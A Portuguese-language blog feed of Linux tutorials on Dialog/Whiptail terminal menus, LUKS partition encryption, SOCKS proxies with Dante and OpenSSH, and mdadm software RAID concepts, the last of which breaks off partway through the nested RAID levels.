Sistemas archivos » Aprende IT Todas as últimas notícias sobre IT Fri, 23 Aug 2024 15:36:38 +0000 pt-PT hourly 1 https://aprendeit.com/wp-content/uploads/2020/02/LOGO-CORTO-100x100.png Sistemas archivos » Aprende IT 32 32 Criando Scripts Interativos no Linux: Usando Dialog ou Whiptail https://aprendeit.com/pt/criando-scripts-interativos-no-linux-usando-dialog-ou-whiptail/ https://aprendeit.com/pt/criando-scripts-interativos-no-linux-usando-dialog-ou-whiptail/#respond Fri, 23 Aug 2024 15:36:38 +0000 https://aprendeit.com/?p=6485 No mundo da administração de sistemas, é comum encontrar a necessidade de automatizar tarefas através de scripts de shell. No entanto, às vezes precisamos tornar esses scripts interativos para facilitar ...

La entrada Criando Scripts Interativos no Linux: Usando Dialog ou Whiptail se publicó primero en Aprende IT.

]]>
No mundo da administração de sistemas, é comum encontrar a necessidade de automatizar tarefas através de scripts de shell. No entanto, às vezes precisamos tornar esses scripts interativos para facilitar a experiência do utilizador, especialmente em ambientes onde não se dispõe de uma interface gráfica completa. É aqui que entram em jogo ferramentas como Dialog e Whiptail.

Tanto o Dialog como o Whiptail são ferramentas que permitem criar interfaces gráficas simples e funcionais dentro de um terminal de texto. Estas ferramentas são muito úteis para desenvolver menus, caixas de diálogo, listas de seleção, barras de progresso e muito mais. Ao longo deste artigo, iremos guiá-lo pelos conceitos básicos e exemplos práticos de ambas as ferramentas para que possa utilizá-las nos seus próprios scripts.

O que é o Dialog?

O Dialog é uma ferramenta de linha de comandos utilizada para gerar caixas de diálogo interativas em terminais baseados em texto. É amplamente utilizada em scripts de shell para criar menus interativos, caixas de confirmação, formulários, barras de progresso, entre outros. O Dialog permite aos utilizadores interagir com um script através de uma interface de utilizador baseada em texto, o que é especialmente útil em ambientes de servidores onde não se dispõe de uma interface gráfica completa.

Instalação do Dialog

Para instalar o Dialog numa distribuição baseada em Debian ou Ubuntu, simplesmente execute o seguinte comando:

sudo apt-get update
sudo apt-get install dialog

Para distribuições baseadas em Red Hat como CentOS ou Fedora:

sudo yum install dialog

Exemplos básicos de Dialog

Caixa de mensagem simples

Este exemplo mostra uma caixa de mensagem simples que tem apenas um botão “OK”:

#!/bin/bash
dialog --title "Mensagem" --msgbox "Olá, esta é uma caixa de mensagem simples." 6 50

Explicação: Neste script, –title define o título da caixa de diálogo, –msgbox é o tipo de diálogo utilizado, e “6 50” são as dimensões da caixa (6 linhas de altura e 50 caracteres de largura).

Menu interativo

O exemplo seguinte cria um menu onde o utilizador pode selecionar uma opção:

#!/bin/bash
opcao=$(dialog --title "Menu Principal" --menu "Selecione uma opção:" 15 50 4
1 "Opção 1"
2 "Opção 2"
3 "Opção 3"
4 "Sair" 3>&1 1>&2 2>&3)
clear

echo "Selecionou a opção: $opcao"

Explicação: O menu é mostrado com opções numeradas. 3>&1 1>&2 2>&3 é utilizado para redirecionar a seleção do utilizador de volta para a saída padrão.

Lista de seleção

Neste exemplo, o utilizador pode selecionar um ou mais itens de uma lista:

#!/bin/bash
opcoes=$(dialog --title "Seleção de Pacotes" --checklist "Selecione os pacotes que deseja instalar:" 15 50 5
1 "Apache" off
2 "MySQL" off
3 "PHP" off
4 "Python" off
5 "Java" off 3>&1 1>&2 2>&3)
clear

echo "Pacotes selecionados: $opcoes"

Explicação: –checklist cria uma lista de itens com caixas de verificação, onde off indica que a caixa está desmarcada por defeito.

Barra de progresso

As barras de progresso são úteis para mostrar o avanço de uma tarefa. Aqui tens um exemplo:

#!/bin/bash
{
for ((i = 0 ; i <= 100 ; i+=10)); do
sleep 1
echo $i
done
} | dialog --title "Progresso" --gauge "A instalar..." 10 70 0

Explicação: –gauge é utilizado para criar uma barra de progresso. O ciclo for simula o avanço de uma tarefa, incrementando a barra em 10% a cada segundo.

O que é o Whiptail?

O Whiptail é uma alternativa leve ao Dialog que também permite criar interfaces interativas baseadas em texto em scripts de shell. Embora o Whiptail ofereça um conjunto semelhante de funcionalidades, é especialmente útil em sistemas onde o Dialog não está disponível ou onde se prefere uma ferramenta mais leve.

Instalação do Whiptail

Para instalar o Whiptail no Debian, Ubuntu e seus derivados:

sudo apt-get update
sudo apt-get install whiptail

Em distribuições como CentOS, Red Hat e Fedora:

sudo yum install newt

Exemplos básicos de Whiptail

Caixa de mensagem simples

Tal como com o Dialog, podes criar uma caixa de mensagem simples:

#!/bin/bash
whiptail --title "Mensagem" --msgbox "Esta é uma mensagem simples usando Whiptail." 8 45

Explicação: Este exemplo é semelhante ao do Dialog, mas utilizando o Whiptail. As dimensões da caixa são ligeiramente diferentes.

Menu interativo

Criar menus interativos é simples com o Whiptail:

#!/bin/bash
opcao=$(whiptail --title "Menu Principal" --menu "Escolha uma opção:" 15 50 4 \
"1" "Opção 1" \
"2" "Opção 2" \
"3" "Opção 3" \
"4" "Sair" 3>&1 1>&2 2>&3)
clear

echo "Selecionou a opção: $opcao"

Explicação: Este script funciona de maneira semelhante ao exemplo do Dialog, permitindo que o utilizador selecione uma opção de um menu.

Lista de seleção

O Whiptail também permite criar listas de seleção com caixas de verificação:

#!/bin/bash
opcoes=$(whiptail --title "Seleção de Pacotes" --checklist "Selecione os pacotes que deseja instalar:" 15 50 5 \
"Apache" "" ON \
"MySQL" "" OFF \
"PHP" "" OFF \
"Python" "" OFF \
"Java" "" OFF 3>&1 1>&2 2>&3)
clear

echo "Pacotes selecionados: $opcoes"

Explicação: Neste exemplo, “ON” indica que a caixa de verificação está marcada por defeito, ao contrário do “off” do Dialog.

Barra de progresso

Finalmente, aqui tens um exemplo de uma barra de progresso com o Whiptail:

#!/bin/bash
{
    for ((i = 0 ; i <= 100 ; i+=10)); do
        sleep 1
        echo $i
    done
} | whiptail --gauge "A instalar..." 6 50 0

Explicação: Este exemplo é muito semelhante ao do Dialog, mas utilizando a sintaxe do Whiptail.
Tanto o Dialog como o Whiptail são ferramentas poderosas e flexíveis que permitem aos administradores de sistemas e desenvolvedores criar interfaces de utilizador interativas dentro de um terminal. Embora ambas as ferramentas sejam semelhantes em termos de funcionalidade, a escolha entre uma ou outra pode depender das necessidades específicas do sistema e das preferências pessoais.

O Dialog é mais popular e amplamente documentado, enquanto o Whiptail é uma alternativa mais leve que pode ser preferida em sistemas onde a minimização do uso de recursos é crucial.

Neste artigo, cobrimos os conceitos básicos do Dialog e do Whiptail com exemplos práticos que lhe permitirão começar a criar os seus próprios scripts interativos. Quer precise de um menu simples, uma caixa de mensagem ou uma barra de progresso, estas ferramentas fornecer-lhe-ão as funcionalidades necessárias para melhorar a interação dos utilizadores com os seus scripts.

Lembre-se de que a chave para dominar estas ferramentas é a prática. Experimente os exemplos fornecidos, modifique-os para se adaptarem às suas necessidades e continue a explorar as múltiplas possibilidades que o Dialog e o Whiptail oferecem para tornar os seus scripts mais intuitivos e fáceis de usar.

Vídeo

Script do vídeo

A seguir, coloco dois scripts de exemplo de dois menus interativos:
Dialog

#!/bin/bash

# Exemplo de menu usando o Dialog
dialog --menu "Selecione uma opção:" 15 50 4 \
1 "Ver informações do sistema" \
2 "Mostrar uso do disco" \
3 "Configurar rede" \
4 "Sair" 2>selecao.txt

# Ler a opção selecionada
opcao=$(cat selecao.txt)

case $opcao in
    1)
        echo "Mostrando informações do sistema..."
        # Os comandos correspondentes iriam aqui
        ;;
    2)
        echo "Mostrando uso do disco..."
        # Os comandos correspondentes iriam aqui
        ;;
    3)
        echo "Configurando a rede..."
        # Os comandos correspondentes iriam aqui
        ;;
    4)
        echo "Saindo..."
        exit 0
        ;;
    *)
        echo "Opção inválida."
        ;;
esac

O resultado seria:

dialog
Whiptail

#!/bin/bash

# Exemplo de menu usando o Whiptail
opcao=$(whiptail --title "Menu Principal" --menu "Selecione uma opção:" 15 50 4 \
"1" "Ver informações do sistema" \
"2" "Mostrar uso do disco" \
"3" "Configurar rede" \
"4" "Sair" 3>&1 1>&2 2>&3)

# Verificar a opção selecionada
case $opcao in
    1)
        echo "Mostrando informações do sistema..."
        # Os comandos correspondentes iriam aqui
        ;;
    2)
        echo "Mostrando uso do disco..."
        # Os comandos correspondentes iriam aqui
        ;;
    3)
        echo "Configurando a rede..."
        # Os comandos correspondentes iriam aqui
        ;;
    4)
        echo "Saindo..."
        exit 0
        ;;
    *)
        echo "Opção inválida."
        ;;
esac

Com o Whiptail, o resultado seria este:

whiptail
Como se pode ver, os resultados são muito parecidos.

Referências e documentação

Para o Dialog e o Whiptail, podemos encontrar uma ampla documentação em https://invisible-island.net/dialog/dialog.html

La entrada Criando Scripts Interativos no Linux: Usando Dialog ou Whiptail se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/criando-scripts-interativos-no-linux-usando-dialog-ou-whiptail/feed/ 0
Cifragem de Partições e Discos com LUKS em Linux https://aprendeit.com/pt/cifragem-de-particoes-e-discos-com-luks-em-linux/ https://aprendeit.com/pt/cifragem-de-particoes-e-discos-com-luks-em-linux/#respond Sun, 12 May 2024 17:08:05 +0000 https://aprendeit.com/?p=6245 Bem-vindo ao fascinante mundo da cifragem de partições e discos em Linux usando LUKS (Linux Unified Key Setup). Neste capítulo, vamos explorar em detalhe como utilizar o LUKS para proteger ...

La entrada Cifragem de Partições e Discos com LUKS em Linux se publicó primero en Aprende IT.

]]>
Bem-vindo ao fascinante mundo da cifragem de partições e discos em Linux usando LUKS (Linux Unified Key Setup). Neste capítulo, vamos explorar em detalhe como utilizar o LUKS para proteger os teus dados sensíveis através da cifragem dos teus discos e partições. Desde a instalação das ferramentas necessárias até ao manuseio de comandos especializados, vou guiar-te passo a passo por este processo crucial para a segurança dos teus dados.

Instalação de Ferramentas Necessárias

Antes de mergulharmos no mundo da cifragem com LUKS, é essencial garantir que tens as ferramentas adequadas instaladas no teu sistema. Geralmente, a maioria das distribuições de Linux inclui estas ferramentas de cifragem por padrão, mas é sempre bom verificar.

Podes instalar as ferramentas necessárias utilizando o gestor de pacotes da tua distribuição. Em distribuições baseadas em Debian, como Ubuntu, podes executar o seguinte comando no terminal:

sudo apt install cryptsetup

Se estás a utilizar uma distribuição baseada em Red Hat, como Fedora ou CentOS, podes instalar as ferramentas de cifragem com o seguinte comando:

sudo dnf install cryptsetup

Uma vez que tenhas instalado o cryptsetup, estarás pronto para começar a trabalhar com LUKS.

Criação de um Volume LUKS

O primeiro passo para cifrar uma partição ou disco em Linux é criar um volume LUKS. Este volume atuará como uma camada de cifragem que protegerá os dados armazenados na partição ou disco.

Para criar um volume LUKS, precisarás especificar a partição ou disco que desejas cifrar. Certifica-te de que a partição está desmontada antes de prosseguir. Suponhamos que queremos cifrar a partição /dev/sdb1. O seguinte comando criará um volume LUKS nesta partição:

sudo cryptsetup luksFormat /dev/sdb1

Este comando iniciará o processo de criação do volume LUKS na partição especificada. Serás solicitado a confirmar esta ação, pois o processo apagará todos os dados existentes na partição. Após confirmar, serás solicitado a introduzir uma senha para desbloquear o volume LUKS no futuro. Certifica-te de escolher uma senha segura e recorda-a bem, pois precisarás dela sempre que quiseres aceder aos dados cifrados.

Uma vez concluído o processo, terás um volume LUKS criado na partição especificada, pronto para ser utilizado.

Abertura e Fecho do Volume LUKS

Depois de criar um volume LUKS, o próximo passo é abri-lo para poder aceder aos dados armazenados nele. Para abrir um volume LUKS, precisarás especificar a partição que contém o volume e atribuir-lhe um nome.

sudo cryptsetup luksOpen /dev/sdb1 minha_particao_cifrada

Neste comando, /dev/sdb1 é a partição que contém o volume LUKS, e minha_particao_cifrada é o nome que estamos a atribuir ao volume aberto. Uma vez que executes este comando, serás solicitado a introduzir a senha que especificaste durante a criação do volume LUKS. Após introduzir a senha correta, o volume será aberto e estará pronto para ser utilizado.

Para fechar o volume LUKS e bloquear o acesso aos dados cifrados, podes utilizar o seguinte comando:

sudo cryptsetup luksClose minha_particao_cifrada

Este comando fechará o volume LUKS com o nome especificado (minha_particao_cifrada neste caso), o que impedirá o acesso aos dados armazenados nele até que seja aberto novamente.

Criação de um Sistema de Ficheiros num Volume LUKS

Uma vez que tenhas aberto um volume LUKS, podes criar um sistema de ficheiros nele para começar a armazenar dados de forma segura. Podes utilizar qualquer sistema de ficheiros compatível com Linux, como xfs ou btrfs.

Suponhamos que queremos criar um sistema de ficheiros xfs no volume LUKS aberto (minha_particao_cifrada). O seguinte comando criará um sistema de ficheiros xfs no volume:

sudo mkfs.xfs /dev/mapper/minha_particao_cifrada

Este comando formatará o volume LUKS aberto com um sistema de ficheiros xfs, o que te permitirá começar a armazenar dados nele de forma segura.

Montagem e Desmontagem de um Volume LUKS

Uma vez que tenhas criado um sistema de ficheiros num volume LUKS, podes montá-lo no sistema de ficheiros para aceder aos dados armazenados nele. Para montar um volume LUKS, podes utilizar o seguinte comando:

sudo mount /dev/mapper/minha_particao_cifrada /mnt

Neste comando, /dev/mapper/minha_particao_cifrada é o caminho para o dispositivo de bloco que representa o volume LUKS aberto, e /mnt é o ponto de montagem onde o sistema de ficheiros será montado.

Depois de montar o volume LUKS, podes aceder aos dados armazenados nele como farias com qualquer outro sistema de ficheiros montado em Linux. Quando terminares de trabalhar com os dados, podes desmontar o volume LUKS utilizando o seguinte comando:

sudo umount /mnt

Este comando desmontará o sistema de ficheiros do volume LUKS, o que evitará que acedas aos dados armazenados nele até que seja montado novamente.

Gestão de Volumes LUKS

O LUKS fornece várias ferramentas para gerir volumes, incluindo a capacidade de mudar a senha, adicionar chaves adicionais e fazer backups dos cabeçalhos dos volumes.

Para mudar a senha de um volume LUKS, podes utilizar o seguinte comando:

sudo cryptsetup luksChangeKey /dev/sdb1

Este comando pedirá a senha atual do volume LUKS e depois permitirá introduzir uma nova senha.

Se desejas adicionar uma chave adicional ao volume LUKS, podes utilizar o seguinte comando:

sudo cryptsetup luksAddKey /dev/sdb1

Este comando pedirá a senha atual do volume LUKS e depois permitirá introduzir uma nova chave adicional.

Para fazer um backup do cabeçalho de um volume LUKS, podes utilizar o seguinte comando:

sudo cryptsetup luksHeaderBackup /dev/sdb1 --header-backup-file backup_file

Este comando fará um backup do cabeçalho do volume LUKS para o ficheiro especificado, permitindo restaurá-lo caso o cabeçalho do volume se danifique.

Resumo de Comandos para Criar Volume Cifrado com LUKS

sudo cryptsetup luksFormat /dev/DISCO
sudo cryptsetup luksOpen /dev/DISCO DISCO_DESCIFRADO
sudo mkfs.xfs /dev/mapper/DISCO_DESCIFRADO
sudo mount /dev/mapper/DISCO_DESCIFRADO /caminho_de_montagem

Integração com crypttab e fstab

Uma vez que tenhas cifrado uma partição ou disco utilizando LUKS em Linux, podes querer configurar a abertura automática do contêiner LUKS durante o arranque do sistema e montá-lo num ponto específico do sistema de ficheiros. Isto pode ser conseguido utilizando os ficheiros de configuração crypttab e fstab.

Configuração de crypttab

O ficheiro crypttab é utilizado para configurar o mapeamento automático de dispositivos cifrados durante o processo de arranque do sistema. Podes especificar os dispositivos cifrados e as suas correspondentes chaves de cifragem neste ficheiro.

Para configurar um dispositivo cifrado no crypttab, primeiro precisas conhecer o UUID (Identificador Único Universal) do contêiner LUKS. Podes encontrar o UUID executando o seguinte comando:

sudo cryptsetup luksUUID /dev/sdb1

Uma vez que tenhas o UUID do contêiner LUKS, podes adicionar uma entrada no ficheiro crypttab para configurar o mapeamento automático. Por exemplo, suponhamos que o UUID do contêiner LUKS é 12345678-1234-1234-1234-123456789abc. Podes adicionar a seguinte entrada no ficheiro crypttab:

minha_particao_cifrada UUID=12345678-1234-1234-1234-123456789abc none luks

Também pode ser feito desta forma sem usar o UUID:

minha_particao_cifrada /dev/sdb1 none luks

Nesta entrada, minha_particao_cifrada é o nome que demos ao contêiner LUKS, e UUID=12345678-1234-1234-1234-123456789abc é o UUID do contêiner. A palavra none indica que não é utilizada uma chave pré-compartilhada, e luks especifica que o dispositivo está cifrado com LUKS.

Configuração de fstab

Uma vez que tenhas configurado o mapeamento automático do dispositivo cifrado no crypttab, podes configurar a montagem automática do sistema de ficheiros no fstab. O ficheiro fstab é utilizado para configurar a montagem automática de sistemas de ficheiros durante o arranque do sistema.

Para configurar a montagem automática de um sistema de ficheiros no fstab, primeiro precisas conhecer o ponto de montagem e o tipo de sistema de ficheiros do contêiner LUKS. Suponhamos que o ponto de montagem é /mnt/minha_particao e o sistema de ficheiros é xfs. Podes adicionar uma entrada no ficheiro fstab da seguinte maneira:

/dev/mapper/minha_particao_cifrada /mnt/minha_particao xfs defaults 0 2

Nesta entrada, /dev/mapper/minha_particao_cifrada é o caminho para o dispositivo de bloco que representa o contêiner LUKS aberto, /mnt/minha_particao é o ponto de montagem onde o sistema de ficheiros será montado, xfs é o tipo de sistema de ficheiros, defaults especifica as opções de montagem por defeito, e 0 2 especifica as opções de verificação do sistema de ficheiros.

Recomendações com crypttab

No caso de um servidor, eu não teria o crypttab ativo, ou seja, deixaria a configuração posta mas comentada, tal como com o fstab. Faria as montagens de forma manual após um reinício. Assim evitamos ter de usar ficheiros de chave e prevenir alguns problemas derivados.

La entrada Cifragem de Partições e Discos com LUKS em Linux se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/cifragem-de-particoes-e-discos-com-luks-em-linux/feed/ 0
Criar proxy socks com dante e com openssh https://aprendeit.com/pt/criar-proxy-socks-com-dante-e-com-openssh/ https://aprendeit.com/pt/criar-proxy-socks-com-dante-e-com-openssh/#respond Mon, 25 Mar 2024 19:17:51 +0000 https://aprendeit.com/?p=6231 Como criar um proxy SOCKS com Dante no Ubuntu Na era digital, manter a privacidade e segurança online é mais crucial do que nunca. Uma das maneiras de proteger a ...

La entrada Criar proxy socks com dante e com openssh se publicó primero en Aprende IT.

]]>
Como criar um proxy SOCKS com Dante no Ubuntu

Na era digital, manter a privacidade e segurança online é mais crucial do que nunca. Uma das maneiras de proteger a sua identidade e dados na rede é através do uso de um servidor proxy SOCKS. Este tipo de proxy atua como um intermediário entre o seu dispositivo e a internet, ocultando o seu endereço IP real e cifrando o seu tráfego de internet. Neste artigo, vamos guiá-lo passo a passo sobre como configurar o seu próprio servidor proxy SOCKS no Ubuntu utilizando o Dante, um servidor proxy versátil e de alto desempenho.

Iniciando a instalação do Dante

Antes de mergulharmos na configuração do Dante, é essencial preparar o seu sistema e garantir que está atualizado. Para isso, abra um terminal e execute os seguintes comandos:

sudo apt update
sudo apt install dante-server

Estes comandos irão atualizar a lista de pacotes do seu sistema e depois instalar o Dante, respectivamente.

Configuração do ficheiro danted.conf

Uma vez instalado o Dante, o próximo passo é configurar o servidor proxy. Isto é feito editando o ficheiro de configuração danted.conf localizado em /etc/danted/. Para isso, use o seu editor de texto preferido. Aqui, vamos usar o vim:

vim /etc/danted.conf

Dentro deste ficheiro, deve especificar detalhes cruciais como as interfaces externa e interna, o método de autenticação e as regras de acesso. A seguir, mostramos uma configuração exemplo que pode ajustar de acordo com as suas necessidades:

logoutput: syslog
user.privileged: root
user.unprivileged: nobody

# A interface externa (pode ser o seu endereço IP público ou o nome da interface)
external: eth0

# A interface interna (geralmente o endereço IP do seu servidor ou loopback)
internal: 0.0.0.0 port=1080

# Método de autenticação
socksmethod: username

# Regras de acesso
client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    log: connect disconnect error
}

# Quem pode utilizar este proxy
socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    command: bind connect udpassociate
    log: connect disconnect error
    socksmethod: username
}

Esta configuração define um servidor SOCKS que escuta em todas as interfaces disponíveis (0.0.0.0) na porta 1080. Utiliza autenticação por nome de utilizador e permite conexões de e para qualquer endereço.

Criação de um utilizador para o proxy

Para que o proxy seja seguro e não esteja aberto ao público, é necessário criar um utilizador específico para a conexão. Isto é conseguido com os seguintes comandos:

sudo useradd -r -s /bin/false nome_utilizador
sudo passwd nome_utilizador

Aqui, nome_utilizador é o nome de utilizador que deseja para a conexão ao proxy. O comando useradd cria o utilizador, e passwd permite-lhe atribuir uma palavra-passe.

Reiniciar e habilitar o serviço Dante

Com o utilizador criado e o ficheiro de configuração ajustado, é momento de reiniciar o serviço Dante e garantir que ele se execute ao início do sistema:

sudo systemctl restart danted.service
sudo systemctl enable danted.service
sudo systemctl status danted.service

Além disso, é importante garantir que a porta 1080, que é onde escuta o proxy, esteja permitida no firewall:

sudo ufw allow 1080/tcp

Verificação da conexão

Finalmente, para verificar se tudo está a funcionar corretamente, pode testar a conexão através do proxy com o seguinte comando:

curl -v -x socks5://nome_utilizador:password@seu_ip_do_servidor:1080 https://qualemeuip.com/

Lembre-se de substituir nome_utilizador, password e seu_ip_do_servidor com as suas informações específicas. Este comando utilizará o seu servidor proxy para aceder a um website que mostra o seu endereço IP público, verificando assim que o tráfego está realmente a ser redirecionado através do proxy SOCKS.

Configurar um servidor proxy SOCKS com Dante pode parecer complexo ao início, mas seguindo estes passos, poderá ter um sistema poderoso

Pode configurar um servidor proxy SOCKS5 utilizando OpenSSH no Ubuntu 22.04, o que é uma alternativa mais simples e direta em certos casos, especialmente para uso pessoal ou em situações onde já tem um servidor SSH configurado. A seguir, explico como fazê-lo:

Criar um proxy Socks 5 com OpenSSH

Ao contrário do Dante, com o qual podemos criar um serviço de proxy com autenticação, com OpenSSH, podemos criar um túnel numa porta que pode ser utilizado como proxy socks sem autenticação, pelo que é conveniente utilizá-lo apenas para localhost dentro de um único equipamento (explicaremos isto melhor depois)

Instalação do OpenSSH Server

Se ainda não tem o OpenSSH Server instalado no seu servidor que vai fazer de proxy, pode instalá-lo com o seguinte comando, desde que seja uma distribuição baseada em Debian / Ubuntu:

sudo apt update
sudo apt install openssh-server

Certifique-se de que o serviço está ativo e a executar corretamente com:

sudo systemctl status ssh

Configuração do Servidor SSH (Opcional)

Por defeito, o OpenSSH escuta na porta 22. Pode ajustar configurações adicionais editando o ficheiro /etc/ssh/sshd_config, como alterar a porta, restringir o acesso a certos utilizadores, etc. Se realizar alterações, lembre-se de reiniciar o serviço SSH:

sudo systemctl restart ssh

Utilização do SSH como um Proxy SOCKS5

Para configurar um túnel SSH que funcione como um proxy SOCKS5, utilize o seguinte comando a partir do seu cliente (não no servidor). Este comando estabelece um túnel SSH que escuta localmente na sua máquina na porta especificada (por exemplo, 1080) e redireciona o tráfego através do servidor SSH:

ssh -D 1080 -C -q -N utilizador@endereço_servidor
  • -D 1080 especifica que o SSH deve criar um proxy SOCKS5 na porta local 1080.
  • -C comprime os dados antes de enviar.
  • -q habilita o modo silencioso que minimiza as mensagens de log.
  • -N indica que não sejam executados comandos remotos, útil quando apenas deseja estabelecer o túnel.
  • utilizador é o seu nome de utilizador no servidor SSH.
  • endereço_servidor é o endereço IP ou domínio do seu servidor SSH.

Neste ponto, mencionamos que com a opção -D deve-se indicar apenas a porta, pois se expor a porta a toda a rede pode permitir que outros equipamentos da rede utilizem este proxy sem autenticação:

[ger@ger-pc ~]$ ssh -D 0.0.0.0:1081 root@192.168.54.100

Se verificarmos com o comando ss ou netstat, podemos ver que está a escutar em todas as redes:

[ger@ger-pc ~]$ ss -putan|grep 1081
tcp LISTEN 0 128 0.0.0.0:1081 0.0.0.0:* users:(("ssh",pid=292405,fd=4)) 
[ger@ger-pc ~]$

No entanto, se conectarmos especificando apenas a porta sem 0.0.0.0 ou sem qualquer IP, o fará apenas no localhost:

[ger@ger-pc ~]$ ssh -D 1081 root@192.168.54.100

.......

[ger@ger-pc ~]$ ss -putan|grep 1081
tcp LISTEN 0 128 127.0.0.1:1081 0.0.0.0:* users:(("ssh",pid=292485,fd=5)) 
tcp LISTEN 0 128 [::1]:1081 [::]:* users:(("ssh",pid=292485,fd=4)) 
[ger@ger-pc ~]$

Conexão através do Proxy SOCKS5:

Agora pode configurar o seu navegador ou aplicação para utilizar o proxy SOCKS5 no localhost e na porta 1080. Cada aplicação tem uma maneira diferente de configurar isto, por isso, precisará rever as preferências ou a documentação da aplicação.

Automatização da Conexão (Opcional):
Se precisar que o túnel se estabeleça automaticamente ao início ou sem interação manual, pode considerar utilizar uma ferramenta como autossh para manter a conexão do túnel aberta e reconectar em caso de queda.

Esta é uma forma eficaz de estabelecer um proxy SOCKS5 rápido para um utilizador ou alguns utilizadores, especialmente útil para contornar restrições de rede ou proteger o seu tráfego em redes não confiáveis. A principal vantagem deste método é a sua simplicidade e que aproveita a infraestrutura SSH existente, sem necessidade de configurar software adicional no servidor.

La entrada Criar proxy socks com dante e com openssh se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/criar-proxy-socks-com-dante-e-com-openssh/feed/ 0
Como criar um software RAID em linux com mdadm https://aprendeit.com/pt/como-criar-um-software-raid-em-linux-com-mdadm/ https://aprendeit.com/pt/como-criar-um-software-raid-em-linux-com-mdadm/#respond Fri, 15 Mar 2024 17:43:28 +0000 https://aprendeit.com/?p=2539 Hoje quisemos alargar este artigo sobre como criar um software RAID em linux com mdadm. Começamos com a teoria. O que é um RAID? Um raid de discos pode ser ...

La entrada Como criar um software RAID em linux com mdadm se publicó primero en Aprende IT.

]]>
Hoje quisemos alargar este artigo sobre como criar um software RAID em linux com mdadm. Começamos com a teoria.

O que é um RAID?

Um raid de discos pode ser definido como um grupo ou conjunto de discos independentes, de facto RAID é um acrónimo de Redundant Array of Independent Disks. Os discos são unificados por software ou hardware para redundar dados e/ou utilizar a capacidade total de cada disco em conjunto. Isto será mais fácil de compreender quando mais tarde definirmos cada tipo de RAID.

Diferença entre RAID por hardware e RAID por software

O que é software RAID?

O RAID por software é, como o nome indica, uma aplicação que permite a criação de RAID a um nível lógico a partir de discos ligados ao nosso equipamento. Este software cria um sistema de ficheiros em que funciona comportando-se de acordo com o tipo de RAID configurado.

O que é RAID Hardware?

Um raid de hardware é um dispositivo físico que permite a criação de um RAID de discos.  Pode ser uma placa de expansão PCI ou PCIE ou pode ser integrado na placa-mãe, este hardware integra tudo o que é necessário para realizar um RAID sem utilizar o processador ou a RAM do sistema (como regra geral), pode também integrar uma cache. Esta cache pode acelerar as operações de leitura/escrita.

Quais são as suas principais diferenças e as vantagens de cada uma delas?

  • O RAID de hardware requer hardware que vem com um custo.
  • Com RAID por hardware, em caso de falha do disco, basta inserir o novo disco e o RAID é normalmente reconstruído sem quaisquer passos adicionais (como regra geral).
  • O software RAID evita o ponto de falha de uma única placa RAID. Se esta placa falhar, o RAID não funcionará.
  • Nos sistemas actuais, a diferença de desempenho em comparação com o RAID por hardware é menos notória, uma vez que os processadores são mais potentes.
  • O RAID de hardware não utiliza os recursos do processador da máquina anfitriã.

Níveis RAID mais utilizados

· RAID 0 (Data Striping, Striped Volume)

Esta rusga toma a capacidade dos discos adicionados e adiciona-os juntos. Por exemplo, se tivermos 2 discos de 1TB com este RAID obteremos um volume de 2TB. Se os discos forem de diferentes capacidades, é sempre necessário o mais baixo a utilizar, bem como as RPM (rotações por minuto) do disco. Ou seja, se tivermos um disco de 2 TB a 7200RPM e outro de 1 TB a 5400RPM, teremos um volume de 2 TB a 5400RPM, ou seja, teremos novamente um volume de 2 TB mas mais lento. É por isso que é importante que os discos sejam semelhantes.

Por outro lado, neste tipo de RAID, o desempenho é uma prioridade mas não a segurança, não há redundância de dados, portanto, se um disco se partir, o volume será corrompido.

raid-0

· RAID 1 (espelho)

Este RAID, tal como no RAID anterior e em todos os RAIDs anteriores, os discos devem ter a mesma capacidade para evitar o desperdício de discos. Neste modo RAID os dois discos são configurados em espelho, o que significa que todo o conteúdo do disco é replicado noutro disco para cada 2 discos 1 disco é dedicado a dados redundantes. É recomendado para 2 discos. Este RAID tem uma vantagem adicional e que é uma maior velocidade de leitura multi-utilizador, uma vez que os dados podem ser lidos a partir de ambos os discos. No entanto, as escritas são mais lentas, pois têm de ser feitas em ambos os discos.

raid-1

· RAID 5

Este RAID é o mais popular devido ao seu baixo custo. Com 3 discos, aproximadamente 75% da capacidade do disco está disponível. Requer apenas um mínimo de 3 discos e suporta a perda completa de um disco. A informação é servida em blocos distribuídos pelo número total de discos, pelo que quanto mais discos, maior o desempenho. Quanto maiores forem os discos, mais tempo demora a reconstruir o RAID no caso de uma falha do disco. Este RAID protege contra falhas, distribuindo o cálculo da paridade por todos os discos e protegendo assim contra possíveis erros de hardware.

O ponto fraco deste tipo de RAID é que se um disco falhar, até ser substituído, o volume fica desprotegido contra a falha de outro disco. É aqui que entram os discos de reserva. Um disco de reserva é um disco de reserva que “entra em jogo” quando um dos discos falha, de modo que o número de discos que podem falhar é de dois (desde que o RAID não esteja a ser reconstruído quando o segundo disco falha). Desta forma evitamos o ponto de falha mencionado anteriormente. Quando o disco de reserva é adicionado, este tipo de RAID é também conhecido como RAID 5E. Existem dois tipos de sobressalentes: “sobressalentes de reserva” e “sobressalentes quentes”.

Se for um disco de reserva, envolve um processo de reconstrução durante a adição do disco de reserva em substituição do disco avariado; no entanto, se for um disco de reserva quente, este tempo é minimizado.

raids-RAID-5

· RAID 6

Digamos que é a evolução do RAID 5, precisa de pelo menos 4 discos. Funciona como RAID 5 mas com dupla banda de paridade que também está espalhada por todos os discos. Este tipo de RAID suporta a falha total de até dois discos, mesmo durante a reconstrução do RAID. É menos utilizado porque quando poucos discos são utilizados, a capacidade de dois discos é desperdiçada porque não atingem o máximo teórico, com 4 discos o RAID terá cerca de metade da capacidade dos discos. Quanto mais discos forem utilizados no RAID, mais capacidade de cada disco é utilizada.

Como no RAID 5, no RAID 6 podem ser adicionados discos sobressalentes (normalmente chamados RAID 6E) para suportar um terceiro disco avariado (o terceiro disco pode falhar sem corromper o volume enquanto o raid não estiver a ser reconstruído).

raids-RAID-6

Niveles RAID anidados

Os níveis de RAID aninhados são “RAID em RAID”. Trata-se de um RAID de um tipo montado em cima de RAID(s) de outro tipo. Desta forma, pode tirar partido dos benefícios de cada RAID. Por exemplo:

  • RAID 0+1 : É um espelho de RAIDs 0, ou seja, se tivermos 4 discos, 2 raids 0 são criados com cada par de discos e com os 2 volumes RAID criados é criado um raid 1. Desta forma, adicionamos redundância ao RAID 0.
